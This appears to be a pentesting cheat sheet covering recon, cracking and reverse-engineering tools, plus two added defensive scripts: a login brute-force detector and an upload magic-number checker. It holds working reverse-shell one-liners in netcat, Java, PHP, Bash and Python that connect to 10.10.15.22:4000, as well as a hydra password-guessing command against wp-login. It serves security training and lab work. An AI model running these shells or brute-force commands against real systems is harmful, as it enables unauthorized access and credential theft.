CheatSheet
This is a simple Cheat Sheet which can be helpful while pentesting
- CheatSheet
- Planned ToDo's
- Useful Guides and Links
- Local Webserver
- Python
- PHP
- Ruby
- Useful Tools
- Shells
- Set Listener
- Reverse Shell
- netcat
- Java
- PHP
- Bash
- Python
- Interactive Shell
- Bash
- Zsh
- Useful Scripts
- HEX Converter
- Ascii to Hex
- Hex to Ascii
- HEX Converter
- Hide yourself
- VPN
- Proxy Chains
- Tor
- Shellcode Dis/Assembler
- File Uploads
- Magic Numbers
CheatSheet
Planned ToDo's
- [ ] write scripts for automating the repetitive tasks like:
- look for domain of the company
- look for subdomains of the domain
- look for dns entries
- use Google Hacking for deeper recon
- generate a detailed report of all findings
- ...
- [x] create a docker-based environment for pentesting/bug bounty hunting (find a way for running GUI based tools in docker)
Useful Guides and Links
For Pentesting/BugBounty-Hunting there is a very detailed map and guide of how to proceed.
Very useful BugBounty CheatSheet from EdOverflow
Bug Bounty Writeups for learning
Local Webserver
Python
python -m SimpleHTTPServer
python3 -m http.server
PHP
php -S 0.0.0.0:8000
Ruby
ruby -run -e httpd . -p 8000
Useful Tools
nmap
scans networks
nmap -sC -sV -oA nmap/openadmin 10.10.10.171
- -sC: scans with the standard scripts
- -sV: scans the versions
gobuster
bruteforce websites to find directories and/or files
gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist
wpscan
scans a target for wordpress related stuff
## basic scan
wpscan --url 10.10.10.10
## advanced scan with plugin detection
wpscan --url 10.10.10.10 --enumerate p,u --plugins-detection aggressive
CeWL
creates wordlist from website
cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10
enum4linux
enumerates Windows and Samba systems
Ports to look for: 445, 139
enum4linux -U -o 10.10.10.10
goofile
finding specific filetypes in domain
goofile -d kali.org -f pdf
searchsploit
searchsploit tomcat
John The Ripper – JTR
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon such as an FTP or telnet server. John, however, needs the hash first, so the greater challenge is to obtain the hash that is to be cracked. Nowadays hashes are often easily crackable using the free rainbow tables available online: submit the hash to one of those sites and, if the hash is of a common word, the site shows the word almost instantly. Rainbow tables basically store common words and their hashes in a large database; the larger the database, the more words are covered.
| Command | Description |
|---|---|
| john --wordlist=/usr/share/wordlists/rockyou.txt hash | JTR password cracking |
| john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt | JTR forced descrypt cracking with wordlist |
| john --format=descrypt hash --show | JTR forced descrypt brute force cracking |
hydra
hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30
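The hydra line above guesses credentials by POSTing username/password pairs to /wp-login.php and treating any response that lacks "Invalid Username" as a hit. The script below is an added example, not part of the original cheat sheet, showing what that attempt looks like from the defender's side: it parses combined-format web access log lines, counts POSTs to the login URL per source address inside a sliding time window, and reports sources that exceed a threshold. WordPress answers a failed login by re-rendering the form (HTTP 200) and a successful one with a redirect (HTTP 302), so a 302 inside such a burst indicates that a guess worked. The log lines, addresses and timestamps are constructed for the example.

```python
"""Detect password-guessing bursts against a web login form in access logs.

Added example (not part of the original cheat sheet). All log lines below are
constructed, not real traffic.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache/nginx combined-format lines: one legitimate login from
# 198.51.100.20 and a burst of six guesses from 203.0.113.7, the last of
# which succeeds (302 redirect) and is followed by a visit to /wp-admin/.
SAMPLE_LOG = """\
198.51.100.20 - - [10/Oct/2023:13:55:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2241 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-login.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:03 +0000] "POST /wp-login.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop query string
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines, login_path="/wp-login.php", threshold=5,
                      window=timedelta(seconds=60), success_status=302):
    """Return {ip: summary} for every source that sent at least `threshold`
    POSTs to `login_path` within some interval of length `window`."""
    attempts = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == login_path:
            attempts[ev["ip"]].append(ev)

    alerts = {}
    for ip, evs in attempts.items():
        evs.sort(key=lambda e: e["ts"])
        # Sliding window: the largest number of attempts that fall inside `window`.
        start, peak = 0, 0
        for end, ev in enumerate(evs):
            while ev["ts"] - evs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {
                "attempts": len(evs),
                "peak_in_window": peak,
                "successes": sum(1 for e in evs if e["status"] == success_status),
                "first": evs[0]["ts"].isoformat(),
                "last": evs[-1]["ts"].isoformat(),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Run it against a real access log by replacing `SAMPLE_LOG.splitlines()` with the file's lines; the 302 heuristic is WordPress-specific, so set `success_status` (or compare response sizes) for other login forms.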
exiftool
Tool to read and modify the metadata of files.
read metadata
exiftool <file>
write metadata
exiftool -artist=me <file>
radare2
radare2 is a tool for reverse-engineering
# start radare2
radare2 file
# analyze all
aa
# list all functions
afl
# set selection to main function
s main
# disassemble
pdf
# show graph
VV
wfuzz
wfuzz is a web fuzzing tool
example of finding vhosts
wfuzz -H "Host: FUZZ.<domain>" -c -z file,"<path/to/wordlist>" <domain>
Reverse Engineering
Get strings from binary
strings binaryFile
Get hexdump from binary
hexdump --canonical binaryFile
Get assembly
objdump -D -M x86-64 binaryFile
Use radare2 to reverse engineer binary
x86 registers
```
================  rax (64 bits)
        ========  eax (32 bits)
            ====  ax  (16 bits)
            ==    ah  (8 bits)
              ==  al  (8 bits)
```
register purposes
| Register | Purpose | Saved across calls |
|---|---|---|
| RAX | temp register; return value | no |
| RBX | callee-saved | yes |
| RCX | used to pass 4th argument to functions | no |
| RDX | used to pass 3rd argument to functions | no |
| RSP | stack pointer | yes |
| RBP | callee-saved; base pointer | yes |
| RSI | used to pass 2nd argument to functions | no |
| RDI | used to pass 1st argument to functions | no |
| R8 | used to pass 5th argument to functions | no |
| R9 | used to pass 6th argument to functions | no |
| R10-11 | temporary | no |
| R12-15 | callee-saved registers | yes |
RISC (ARM) instruction set
MOV DESTINATION, SOURCE
Stack
Stackpointer
- points to the next item on the stack
- grows downwards
Base pointer
- unchanged point in memory where the stack starts
```
memory:                       CPU:
0x0000  ________
       |        | <-------------- | SP |
       |        |        |------- | BP |
       |        |        |        | IP |
       |        | <------|        | .. |
       |        |                 | .. |
       |        |                 | .. |
0xFFFF |________|
```
Shells
Set Listener
nc -lnvp 4000
Reverse Shell
netcat
nc -e /bin/sh 10.10.15.22 4000
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
PHP
php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Bash
bash -i >& /dev/tcp/10.10.15.22/4000 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Interactive Shell
- can be executed with python or python3
Bash
python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
Zsh
python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
Useful Scripts
HEX Converter
Ascii to Hex
#!/bin/bash
# print the first argument as space-separated hex bytes, 16 per line
# (printf '%s' emits no trailing newline and "$1" keeps spaces intact)
printf '%s' "$1" | hexdump -v -e '16/1 "%02x " "\n"'
Hex to Ascii
#!/bin/bash
# decode plain hex (whitespace between bytes is allowed) back to ASCII
printf '%s' "$1" | xxd -r -p
Hide yourself
Interesting Stack Exchange link
VPN
Proxy Chains
A proxy is an intermediary between the two communication partners. If you send a request to a server, the proxy intercepts it and forwards it to the server as if the proxy itself had sent it, so the server does not learn who the original client was; the response travels back the same way.
A proxy chain is multiple proxy servers chained together, which makes it much more difficult to identify the initial sender (the client).
Tor
Here is a nice graphic on who sees what in Tor and HTTPS cases.
Shellcode Dis/Assembler
File Uploads
Use
Magic Numbers
- these magic numbers at the start of a file define the type of file
BMP : 42 4D
JPG : FF D8 FF E0
PNG : 89 50 4E 47
GIF : 47 49 46 38
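Because the leading bytes define the file type, a server-side upload filter should compare the type implied by those bytes with the type the file name claims, rather than trusting the extension or the Content-Type header. The script below is an added example, not part of the original cheat sheet; it uses the signatures listed above and goes one step further for JPEG, matching only the first three bytes (FF D8 FF) because only JFIF files carry E0 as the fourth byte while Exif-tagged ones carry E1. Function names and the sample byte strings are constructed for the example.

```python
"""Validate an upload by its magic number, not by the name it was given.

Added example (not part of the original cheat sheet). Sample inputs are
constructed inline.
"""

# Leading bytes -> type, from the list above (JPEG generalised to FF D8 FF).
MAGIC = {
    "bmp": b"\x42\x4d",          # "BM"
    "jpg": b"\xff\xd8\xff",      # FF D8 FF E0 (JFIF) / FF D8 FF E1 (Exif)
    "png": b"\x89\x50\x4e\x47",  # ".PNG"
    "gif": b"\x47\x49\x46\x38",  # "GIF8"
}

# Extensions that name the same type as a key in MAGIC.
EXT_ALIASES = {"jpeg": "jpg", "jpe": "jpg"}


def sniff_type(data: bytes):
    """Return the type implied by the magic number, or None if it is unknown."""
    for kind, sig in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def check_upload(filename: str, data: bytes, allowed=("png", "jpg", "gif", "bmp")):
    """Decide whether an upload may be accepted.

    Returns (accepted, detail). Rejects extensions outside `allowed`, content
    with no known signature, and any mismatch between the type the name
    claims and the type the leading bytes show.
    """
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    ext = EXT_ALIASES.get(ext, ext)
    if ext not in allowed:
        return False, f"extension '{ext or '(none)'}' not allowed"
    kind = sniff_type(data)
    if kind is None:
        return False, "content does not start with a known image signature"
    if kind != ext:
        return False, f"content is {kind} but name says {ext}"
    return True, kind


# Constructed samples: a minimal PNG header, a GIF header mis-named as PNG,
# an Exif JPEG header with a .jpeg extension, plain text named .png, and a PDF.
SAMPLES = [
    ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ("photo.png", b"GIF89a\x01\x00\x01\x00"),
    ("scan.jpeg", b"\xff\xd8\xff\xe1\x00\x10Exif\x00\x00"),
    ("notes.png", b"just some text\n"),
    ("report.pdf", b"%PDF-1.4\n"),
]

if __name__ == "__main__":
    for name, blob in SAMPLES:
        print(name, check_upload(name, blob))
```

The signature check is one layer only: the bytes are trivial to prepend to any content, so on the server also store uploads outside the web root, serve them with a fixed Content-Type, and re-encode images with an image library so that whatever followed the header is discarded.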
Privilege Escalation
- find programs which can be executed with sudo without a password
sudo -l
- find files that belong to root but are readable by anyone because of their group permissions